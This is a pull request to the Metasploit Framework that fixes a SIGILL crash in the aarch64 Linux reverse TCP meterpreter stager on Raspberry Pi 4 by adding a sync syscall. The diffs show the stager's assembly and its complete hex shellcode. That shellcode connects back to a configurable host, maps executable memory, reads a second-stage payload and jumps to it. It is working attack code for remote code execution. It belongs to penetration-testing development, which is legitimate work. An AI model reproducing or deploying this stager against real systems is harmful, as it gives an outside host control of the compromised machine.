### PR TITLE
Fix SIGILL on staged meterpreter on RaspberryPi4

### DIFF
--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,10 +77,10 @@ read_loop:
     svc    0
     cmn    x0, #0x1
     beq    failed
-    mov    x2, x0       # The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
-    mov    x8, #0x51    # More information here: 
-    svc    0            #    https://github.com/rapid7/metasploit-framework/pull/19875
-    mov    x0, x2       #
+    mov    x2, x0       // The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
+    mov    x8, #0x51    // More information here: 
+    svc    0            //    https://github.com/rapid7/metasploit-framework/pull/19875
+    mov    x0, x2       //
     add    x3, x3, x0
     subs   x4, x4, x0
     bne    read_loop

--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,6 +77,10 @@ read_loop:
     svc    0
     cmn    x0, #0x1
     beq    failed
+    mov    x2, x0
+    mov    x8, #0x51
+    svc    0
+    mov    x0, x2
     add    x3, x3, x0
     subs   x4, x4, x0
     bne    read_loop

--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
@@ -77,10 +77,10 @@ read_loop:
     svc    0
     cmn    x0, #0x1
     beq    failed
-    mov    x2, x0
-    mov    x8, #0x51
-    svc    0
-    mov    x0, x2
+    mov    x2, x0       # The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
+    mov    x8, #0x51    # More information here: 
+    svc    0            #    https://github.com/rapid7/metasploit-framework/pull/19875
+    mov    x0, x2       #
     add    x3, x3, x0
     subs   x4, x4, x0
     bne    read_loop

--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -15,7 +15,7 @@
 ###
 module MetasploitModule
 
-  CachedSize = 212
+  CachedSize = 228
 
   include Msf::Payload::Linux::Aarch64::Prepends
   include Msf::Payload::Stager

--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -32,7 +32,7 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LPORT' => [ 212, 'n'    ],
+              'LPORT' => [ 222, 'n'    ],
               'LHOST' => [ 224, 'ADDR' ],
             },
           'Payload' =>

--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -32,65 +32,69 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LPORT' => [ 206, 'n'    ],
-              'LHOST' => [ 208, 'ADDR' ],
+              'LPORT' => [ 212, 'n'    ],
+              'LHOST' => [ 224, 'ADDR' ],
             },
           'Payload' =>
           [
             # Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s
-            0xd2800040,          #  mov	x0, #0x2                   	// #2
-            0xd2800021,          #  mov	x1, #0x1                   	// #1
-            0xd2800002,          #  mov	x2, #0x0                   	// #0
-            0xd28018c8,          #  mov	x8, #0xc6                  	// #198
-            0xd4000001,          #  svc	#0x0
-            0xaa0003ec,          #  mov	x12, x0
-            0x100005a1,          #  adr	x1, cc <sockaddr>
-            0xd2800202,          #  mov	x2, #0x10                  	// #16
-            0xd2801968,          #  mov	x8, #0xcb                  	// #203
-            0xd4000001,          #  svc	#0x0
-            0x350004c0,          #  cbnz	w0, c0 <failed>
-            0xaa0c03e0,          #  mov	x0, x12
-            0xd10043ff,          #  sub	sp, sp, #0x10
-            0x910003e1,          #  mov	x1, sp
-            0xd2800082,          #  mov	x2, #0x4                   	// #4
-            0xd28007e8,          #  mov	x8, #0x3f                  	// #63
-            0xd4000001,          #  svc	#0x0
-            0xb100041f,          #  cmn	x0, #0x1
-            0x540003c0,          #  b.eq	c0 <failed>
-            0xb94003e2,          #  ldr	w2, [sp]
-            0xd34cfc42,          #  lsr	x2, x2, #12
-            0x91000442,          #  add	x2, x2, #0x1
-            0xd374cc42,          #  lsl	x2, x2, #12
-            0xaa1f03e0,          #  mov	x0, xzr
-            0xaa0203e1,          #  mov	x1, x2
-            0xd28000e2,          #  mov	x2, #0x7                   	// #7
-            0xd2800443,          #  mov	x3, #0x22                  	// #34
-            0xaa1f03e4,          #  mov	x4, xzr
-            0xaa1f03e5,          #  mov	x5, xzr
-            0xd2801bc8,          #  mov	x8, #0xde                  	// #222
-            0xd4000001,          #  svc	#0x0
-            0xb100041f,          #  cmn	x0, #0x1
-            0x54000200,          #  b.eq	c0 <failed>
-            0xb94003e4,          #  ldr	w4, [sp]
-            0xf90003e0,          #  str	x0, [sp]
-            0xaa0003e3,          #  mov	x3, x0
-            0xaa0c03e0,          #  mov	x0, x12
-            0xaa0303e1,          #  mov	x1, x3
-            0xaa0403e2,          #  mov	x2, x4
-            0xd28007e8,          #  mov	x8, #0x3f                  	// #63
-            0xd4000001,          #  svc	#0x0
-            0xb100041f,          #  cmn	x0, #0x1
-            0x540000c0,          #  b.eq	c0 <failed>
-            0x8b000063,          #  add	x3, x3, x0
-            0xeb000084,          #  subs	x4, x4, x0
-            0x54fffee1,          #  b.ne	90 <read_loop>
-            0xf94003e0,          #  ldr	x0, [sp]
-            0xd63f0000,          #  blr	x0
-            0xd2800000,          #  mov	x0, #0x0                   	// #0
-            0xd2800ba8,          #  mov	x8, #0x5d                  	// #93
-            0xd4000001,          #  svc	#0x0
-            0x5c110002,          #  .word	0x5c110002
-            0x0100007f,          #  .word	0x0100007f
+            0xd2800040, #   mov     x0, #0x2                        // #2
+            0xd2800021, #   mov     x1, #0x1                        // #1
+            0xd2800002, #   mov     x2, #0x0                        // #0
+            0xd28018c8, #   mov     x8, #0xc6                       // #198
+            0xd4000001, #   svc     #0x0
+            0xaa0003ec, #   mov     x12, x0
+            0x10000621, #   adr     x1, dc <sockaddr>
+            0xd2800202, #   mov     x2, #0x10                       // #16
+            0xd2801968, #   mov     x8, #0xcb                       // #203
+            0xd4000001, #   svc     #0x0
+            0x35000540, #   cbnz    w0, d0 <failed>
+            0xaa0c03e0, #   mov     x0, x12
+            0xd10043ff, #   sub     sp, sp, #0x10
+            0x910003e1, #   mov     x1, sp
+            0xd2800082, #   mov     x2, #0x4                        // #4
+            0xd28007e8, #   mov     x8, #0x3f                       // #63
+            0xd4000001, #   svc     #0x0
+            0xb100041f, #   cmn     x0, #0x1
+            0x54000440, #   b.eq    d0 <failed>  // b.none
+            0xb94003e2, #   ldr     w2, [sp]
+            0xd34cfc42, #   lsr     x2, x2, #12
+            0x91000442, #   add     x2, x2, #0x1
+            0xd374cc42, #   lsl     x2, x2, #12
+            0xaa1f03e0, #   mov     x0, xzr
+            0xaa0203e1, #   mov     x1, x2
+            0xd28000e2, #   mov     x2, #0x7                        // #7
+            0xd2800443, #   mov     x3, #0x22                       // #34
+            0xaa1f03e4, #   mov     x4, xzr
+            0xaa1f03e5, #   mov     x5, xzr
+            0xd2801bc8, #   mov     x8, #0xde                       // #222
+            0xd4000001, #   svc     #0x0
+            0xb100041f, #   cmn     x0, #0x1
+            0x54000280, #   b.eq    d0 <failed>  // b.none
+            0xb94003e4, #   ldr     w4, [sp]
+            0xf90003e0, #   str     x0, [sp]
+            0xaa0003e3, #   mov     x3, x0
+            0xaa0c03e0, #   mov     x0, x12
+            0xaa0303e1, #   mov     x1, x3
+            0xaa0403e2, #   mov     x2, x4
+            0xd28007e8, #   mov     x8, #0x3f                       // #63
+            0xd4000001, #   svc     #0x0
+            0xb100041f, #   cmn     x0, #0x1
+            0x54000140, #   b.eq    d0 <failed>  // b.none
+            0xaa0003e2, #   mov     x2, x0
+            0xd2800a28, #   mov     x8, #0x51                       // #81
+            0xd4000001, #   svc     #0x0
+            0xaa0203e0, #   mov     x0, x2
+            0x8b000063, #   add     x3, x3, x0
+            0xeb000084, #   subs    x4, x4, x0
+            0x54fffe61, #   b.ne    90 <read_loop>  // b.any
+            0xf94003e0, #   ldr     x0, [sp]
+            0xd63f0000, #   blr     x0
+            0xd2800000, #   mov     x0, #0x0                        // #0
+            0xd2800ba8, #   mov     x8, #0x5d                       // #93
+            0xd4000001, #   svc     #0x0
+            0x5c110002, #   .short  0x5c110002
+            0x0100007f  #   .word   0x0100007f
           ].pack("V*")
         }
       ))


### PR DESCRIPTION
This PR fixes: [this issue](https://github.com/rapid7/metasploit-framework/issues/19865)

## ISSUE
Inside the `read_loop` the `read` syscall get the data from the socket file descriptor and write it to the new memory.
When we are executing the payload with `./metsrv` we get a `SIGILL` on the start of MMAP, if we run the program using strace, the program works flowlessly.
The issue was identified by @h00die-gr3y  on [this pr](https://github.com/rapid7/metasploit-framework/pull/19841)

## FIX
The fix is simply adding a `sync()` syscall after each read() to enforce cache flushing (?). I still have no idea why it works but it does.
